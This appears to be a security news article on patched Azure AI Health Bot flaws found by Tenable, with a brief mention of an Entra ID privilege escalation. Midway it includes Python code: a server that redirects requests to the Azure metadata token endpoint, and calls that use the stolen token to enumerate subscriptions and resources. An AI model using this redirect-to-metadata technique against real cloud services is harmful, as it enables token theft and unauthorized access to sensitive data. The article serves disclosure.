Cybersecurity researchers have discovered two security flaws in Microsoft’s Azure Health Bot service that, if exploited, could allow malicious actors to achieve lateral movement in a client environment and gain access to sensitive patient data.
The critical issues, which have since been fixed by Microsoft, could have permitted cross-tenant resource access within the service, Tenable said in a report shared with The Hacker News.
The Azure AI Health Bot service is a cloud platform enabling developers in healthcare organizations to create and deploy AI-powered virtual healthcare assistants and create co-pilots to manage administrative workloads and interact with patients.
These include bots created by insurance providers that allow customers to view claim status and ask questions about benefits and services, as well as bots operated by healthcare organizations to help patients find appropriate care or find nearby doctors.
Tenable’s research specifically focuses on one aspect of the Azure AI Health Bot Service called Data Connections, which, as the name suggests, offers a mechanism to integrate data from external sources, whether third parties or the service providers’ own API endpoints.
While this feature has built-in protections to prevent unauthorized access to internal APIs, further investigation revealed that these protections can be bypassed by issuing redirect responses (such as 301 or 302 status codes) when configuring a data connection with an external host under the attacker's control.
By configuring the host to respond to requests with a 301 redirect destined for the Azure Instance Metadata Service (IMDS), Tenable said it's possible to obtain a valid metadata response and subsequently get an access token for management.azure(.)com.
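The redirect trick described above can be sketched as a minimal attacker-controlled endpoint. This is an illustrative reconstruction, not Tenable's actual proof of concept: the IMDS token URL is the publicly documented Azure endpoint, while the server itself is a hypothetical stand-in for the external host configured in the data connection.

```python
# Sketch of a hypothetical attacker-controlled host: every request the
# Health Bot's data connection sends here is answered with a 301 pointing
# at the Azure IMDS token endpoint, so the service-side HTTP client that
# follows the redirect ends up querying IMDS on the attacker's behalf.
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading

# Publicly documented IMDS endpoint for requesting a managed-identity token
# scoped to the Azure Resource Manager (management.azure.com).
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectToIMDS(BaseHTTPRequestHandler):
    def do_GET(self):
        # Respond to any path with a permanent redirect to IMDS.
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

    def log_message(self, *args):
        # Keep the sketch quiet; default handler logs every request.
        pass

def serve_redirector(port: int) -> HTTPServer:
    """Start the redirecting server on localhost in a background thread."""
    srv = HTTPServer(("127.0.0.1", port), RedirectToIMDS)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv
```

In the real attack the client doing the redirect-following runs inside Azure, where the link-local IMDS address is reachable; from anywhere else the redirect target simply times out.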
The token can then be used to list the subscriptions it grants access to by calling a Microsoft endpoint, which returns an internal subscription ID that can ultimately be used to enumerate accessible resources via another API call.
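The enumeration steps above follow the standard Azure Resource Manager REST API. The sketch below only builds the two requests involved (it does not send them); the endpoint paths and API versions are the documented ARM ones, and the token value is assumed to be the one stolen via IMDS.

```python
# Sketch of the two ARM enumeration calls: list subscriptions visible to
# the stolen token, then list resources within a given subscription.
import urllib.request

ARM = "https://management.azure.com"

def build_list_subscriptions_request(token: str) -> urllib.request.Request:
    # GET /subscriptions returns the subscription IDs the bearer token can see.
    return urllib.request.Request(
        f"{ARM}/subscriptions?api-version=2020-01-01",
        headers={"Authorization": f"Bearer {token}"},
    )

def build_list_resources_request(token: str, subscription_id: str) -> urllib.request.Request:
    # GET /subscriptions/{id}/resources enumerates resources in that subscription.
    return urllib.request.Request(
        f"{ARM}/subscriptions/{subscription_id}/resources?api-version=2021-04-01",
        headers={"Authorization": f"Bearer {token}"},
    )
```

Each request would be dispatched with `urllib.request.urlopen(...)`; with a cross-tenant token, the responses expose resources belonging to other customers.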
Separately, another endpoint related to integrating systems that support the Fast Healthcare Interoperability Resources (FHIR) data exchange format was found to be susceptible to the same attack.
Tenable said it reported its findings to Microsoft in June and July 2024, after which the Windows maker began rolling out fixes to all regions. There is no evidence that the issues were exploited in the wild.
“These vulnerabilities raise concerns about how chatbots could be used to reveal sensitive information,” Tenable said in a statement. “Specifically, the vulnerabilities involved a flaw in the underlying architecture of the chatbot service, highlighting the importance of traditional web and cloud security in the age of AI chatbots.”
The disclosure comes days after Semperis detailed an attack technique dubbed UnOAuthorized that could allow privilege escalation using Microsoft Entra ID (formerly Azure Active Directory), including the ability to add and remove users from privileged roles. Microsoft has since plugged the security hole.
“A threat actor could use this access to elevate privileges to a global administrator and install additional security features in the tenant,” security researcher Eric Woodruff said. “An attacker could also use this access to perform lateral movement to any system in Microsoft 365 or Azure, as well as any SaaS application connected to Entra ID.”